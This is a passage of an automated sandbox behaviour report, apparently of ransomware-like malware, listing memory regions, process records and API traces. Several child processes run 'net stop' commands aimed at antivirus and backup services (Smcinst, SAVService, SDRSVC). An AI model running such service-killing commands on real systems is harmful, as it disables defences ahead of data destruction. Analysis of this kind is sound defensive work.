"\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9689 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9690 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9691 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 9692 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9693 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9694 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 9695 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 9696 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 9697 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9698 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 735 os_tid = 0xebc Process: id = "258" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x53bde000" os_pid = "0xfa0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop Smcinst /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9699 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9700 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9701 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9702 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9703 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9704 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9705 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9706 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 9707 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9708 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9709 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 9710 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 9711 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 9712 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9713 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 737 os_tid = 0xee4 Process: id = "259" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5f959000" os_pid = "0x1030" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "249" os_parent_pid = "0xe54" cmd_line = "C:\\Windows\\system32\\net1 stop SAVService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9734 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9735 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9736 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9737 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 9738 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9739 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9740 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9741 start_va = 0xff3f0000 end_va = 0xff422fff entry_point = 0xff3f0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 9742 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9743 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9744 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 9745 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 9746 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 9747 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9748 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9749 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9750 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9751 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9752 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 9753 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 9754 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9755 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 9756 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 9757 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 9758 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 9759 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 9760 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 9761 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 9762 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 9763 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 9764 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 9765 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9766 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9767 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9768 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9769 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 9770 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9771 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9825 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 739 os_tid = 0xe6c [0109.800] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fbd0 | out: lpSystemTimeAsFileTime=0x14fbd0*(dwLowDateTime=0xf698ce70, dwHighDateTime=0x1d48689)) [0109.800] GetCurrentProcessId () returned 0x1030 [0109.800] GetCurrentThreadId () returned 0xe6c [0109.800] GetTickCount () returned 0x252b1 [0109.800] QueryPerformanceCounter (in: lpPerformanceCount=0x14fbd8 | out: lpPerformanceCount=0x14fbd8*=1815671800000) returned 1 [0109.802] GetModuleHandleW (lpModuleName=0x0) returned 0xff3f0000 [0109.802] __set_app_type (_Type=0x1) [0109.802] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff409c9c) returned 0x0 [0109.802] __getmainargs (in: _Argc=0xff414780, _Argv=0xff414790, _Env=0xff414788, _DoWildCard=0, _StartInfo=0xff41479c | out: _Argc=0xff414780, _Argv=0xff414790, _Env=0xff414788) returned 0 [0109.802] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0109.802] GetConsoleOutputCP () returned 0x1b5 [0109.891] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff41cec0 | out: lpCPInfo=0xff41cec0) returned 1 [0109.891] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0109.893] sprintf_s (in: _DstBuf=0x14fb78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0109.893] setlocale (category=0, locale=".437") returned="English_United States.437" [0109.895] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.895] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0109.895] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SAVService /y" [0109.895] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0109.895] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0109.895] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x14fb68 | out: Buffer=0x14fb68*=0x344d50) returned 0x0 [0109.895] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x14fb68 | out: Buffer=0x14fb68*=0x34c0f0) returned 0x0 [0109.895] _fileno (_File=0x7fefdba2a80) returned 0 [0109.895] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0109.895] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0109.895] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0109.895] _wcsicmp (_String1="config", _String2="stop") returned -16 [0109.895] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0109.895] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0109.895] _wcsicmp (_String1="file", _String2="stop") returned -13 [0109.895] _wcsicmp (_String1="files", _String2="stop") returned -13 [0109.895] _wcsicmp (_String1="group", _String2="stop") returned -12 [0109.896] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0109.896] _wcsicmp (_String1="help", _String2="stop") returned -11 [0109.896] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0109.896] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0109.896] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0109.896] _wcsicmp (_String1="session", _String2="stop") returned -15 [0109.896] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0109.896] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0109.896] _wcsicmp (_String1="share", _String2="stop") returned -12 [0109.896] _wcsicmp (_String1="start", _String2="stop") returned -14 [0109.896] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0109.896] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0109.896] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0109.896] _wcsicmp (_String1="accounts", _String2="SAVService") returned -18 [0109.896] _wcsicmp (_String1="computer", _String2="SAVService") returned -16 [0109.896] _wcsicmp (_String1="config", _String2="SAVService") returned -16 [0109.896] _wcsicmp (_String1="continue", _String2="SAVService") returned -16 [0109.896] _wcsicmp (_String1="cont", _String2="SAVService") returned -16 [0109.896] _wcsicmp (_String1="file", _String2="SAVService") returned -13 [0109.896] _wcsicmp (_String1="files", _String2="SAVService") returned -13 [0109.896] _wcsicmp (_String1="group", _String2="SAVService") returned -12 [0109.896] _wcsicmp (_String1="groups", _String2="SAVService") returned -12 [0109.896] _wcsicmp (_String1="help", _String2="SAVService") returned -11 [0109.896] _wcsicmp (_String1="helpmsg", _String2="SAVService") returned -11 [0109.896] _wcsicmp (_String1="localgroup", _String2="SAVService") returned -7 [0109.896] _wcsicmp (_String1="pause", _String2="SAVService") returned -3 [0109.896] _wcsicmp (_String1="session", _String2="SAVService") returned 4 [0109.896] _wcsicmp (_String1="sessions", _String2="SAVService") returned 4 [0109.896] _wcsicmp (_String1="sess", _String2="SAVService") returned 4 [0109.896] _wcsicmp (_String1="share", _String2="SAVService") returned 7 [0109.896] _wcsicmp (_String1="start", _String2="SAVService") returned 19 [0109.896] _wcsicmp (_String1="stats", _String2="SAVService") returned 19 [0109.896] _wcsicmp (_String1="statistics", _String2="SAVService") returned 19 [0109.896] _wcsicmp (_String1="stop", _String2="SAVService") returned 19 [0109.897] _wcsicmp (_String1="time", _String2="SAVService") returned 1 [0109.897] _wcsicmp (_String1="user", _String2="SAVService") returned 2 [0109.897] _wcsicmp (_String1="users", _String2="SAVService") returned 2 [0109.897] _wcsicmp (_String1="msg", _String2="SAVService") returned -6 [0109.897] _wcsicmp (_String1="messenger", _String2="SAVService") returned -6 [0109.897] _wcsicmp (_String1="receiver", _String2="SAVService") returned -1 [0109.897] _wcsicmp (_String1="rcv", _String2="SAVService") returned -1 [0109.897] _wcsicmp (_String1="netpopup", _String2="SAVService") returned -5 [0109.897] _wcsicmp (_String1="redirector", _String2="SAVService") returned -1 [0109.897] _wcsicmp (_String1="redir", _String2="SAVService") returned -1 [0109.897] _wcsicmp (_String1="rdr", _String2="SAVService") returned -1 [0109.897] _wcsicmp (_String1="workstation", _String2="SAVService") returned 4 [0109.897] _wcsicmp (_String1="work", _String2="SAVService") returned 4 [0109.897] _wcsicmp (_String1="wksta", _String2="SAVService") returned 4 [0109.897] _wcsicmp (_String1="prdr", _String2="SAVService") returned -3 [0109.897] _wcsicmp (_String1="devrdr", _String2="SAVService") returned -15 [0109.897] _wcsicmp (_String1="lanmanworkstation", _String2="SAVService") returned -7 [0109.897] _wcsicmp (_String1="server", _String2="SAVService") returned 4 [0109.897] _wcsicmp (_String1="svr", _String2="SAVService") returned 21 [0109.897] _wcsicmp (_String1="srv", _String2="SAVService") returned 17 [0109.897] _wcsicmp (_String1="lanmanserver", _String2="SAVService") returned -7 [0109.897] _wcsicmp (_String1="alerter", _String2="SAVService") returned -18 [0109.897] _wcsicmp (_String1="netlogon", _String2="SAVService") returned -5 [0109.897] _wcsupr (in: _String="SAVService" | out: _String="SAVSERVICE") returned="SAVSERVICE" [0109.897] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x34ce00 [0109.901] GetServiceKeyNameW (in: hSCManager=0x34ce00, lpDisplayName="SAVSERVICE", lpServiceName=0xff415750, lpcchBuffer=0x14fa88 | out: lpServiceName="", lpcchBuffer=0x14fa88) returned 0 [0109.903] _wcsicmp (_String1="msg", _String2="SAVSERVICE") returned -6 [0109.903] _wcsicmp (_String1="messenger", _String2="SAVSERVICE") returned -6 [0109.903] _wcsicmp (_String1="receiver", _String2="SAVSERVICE") returned -1 [0109.903] _wcsicmp (_String1="rcv", _String2="SAVSERVICE") returned -1 [0109.903] _wcsicmp (_String1="redirector", _String2="SAVSERVICE") returned -1 [0109.903] _wcsicmp (_String1="redir", _String2="SAVSERVICE") returned -1 [0109.903] _wcsicmp (_String1="rdr", _String2="SAVSERVICE") returned -1 [0109.903] _wcsicmp (_String1="workstation", _String2="SAVSERVICE") returned 4 [0109.903] _wcsicmp (_String1="work", _String2="SAVSERVICE") returned 4 [0109.903] _wcsicmp (_String1="wksta", _String2="SAVSERVICE") returned 4 [0109.903] _wcsicmp (_String1="prdr", _String2="SAVSERVICE") returned -3 [0109.903] _wcsicmp (_String1="devrdr", _String2="SAVSERVICE") returned -15 [0109.903] _wcsicmp (_String1="lanmanworkstation", _String2="SAVSERVICE") returned -7 [0109.903] _wcsicmp (_String1="server", _String2="SAVSERVICE") returned 4 [0109.903] _wcsicmp (_String1="svr", _String2="SAVSERVICE") returned 21 [0109.903] _wcsicmp (_String1="srv", _String2="SAVSERVICE") returned 17 [0109.903] _wcsicmp (_String1="lanmanserver", _String2="SAVSERVICE") returned -7 [0109.903] _wcsicmp (_String1="alerter", _String2="SAVSERVICE") returned -18 [0109.903] _wcsicmp (_String1="netlogon", _String2="SAVSERVICE") returned -5 [0109.903] NetServiceControl (in: servername=0x0, service="SAVSERVICE", opcode=0x0, arg=0x0, bufptr=0x14fa90 | out: bufptr=0x14fa90) returned 0x889 [0109.904] wcscpy_s (in: _Destination=0xff4180d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0109.904] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0109.905] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff415b50, nSize=0x800, Arguments=0xff417f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0109.906] GetFileType (hFile=0xb) returned 0x2 [0109.906] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f958 | out: lpMode=0x14f958) returned 1 [0109.907] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff415b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x14f950, lpReserved=0x0 | out: lpBuffer=0xff415b50*, lpNumberOfCharsWritten=0x14f950*=0x1e) returned 1 [0109.907] GetFileType (hFile=0xb) returned 0x2 [0109.907] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f958 | out: lpMode=0x14f958) returned 1 [0109.907] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f950, lpReserved=0x0 | out: lpBuffer=0xff3f1efc*, lpNumberOfCharsWritten=0x14f950*=0x2) returned 1 [0109.908] _ultow (in: _Dest=0x889, _Radix=1374656 | out: _Dest=0x889) returned="2185" [0109.908] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff415b50, nSize=0x800, Arguments=0xff417f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0109.908] GetFileType (hFile=0xb) returned 0x2 [0109.908] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f958 | out: lpMode=0x14f958) returned 1 [0109.908] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff415b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14f950, lpReserved=0x0 | out: lpBuffer=0xff415b50*, lpNumberOfCharsWritten=0x14f950*=0x34) returned 1 [0109.909] GetFileType (hFile=0xb) returned 0x2 [0109.909] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f958 | out: lpMode=0x14f958) returned 1 [0109.909] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f950, lpReserved=0x0 | out: lpBuffer=0xff3f1efc*, lpNumberOfCharsWritten=0x14f950*=0x2) returned 1 [0109.909] NetApiBufferFree (Buffer=0x344d50) returned 0x0 [0109.909] NetApiBufferFree (Buffer=0x34c0f0) returned 0x0 [0109.909] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SAVService /y" [0109.909] exit (_Code=2) Process: id = "260" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x53edd000" os_pid = "0xea8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "251" os_parent_pid = "0xfbc" cmd_line = "C:\\Windows\\system32\\net1 stop SDRSVC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9772 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9773 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9774 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9775 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 9776 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9777 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9778 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9779 start_va = 0xff3f0000 end_va = 0xff422fff entry_point = 0xff3f0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 9780 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9781 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9782 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 9783 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 9784 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 9785 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9786 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9787 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = 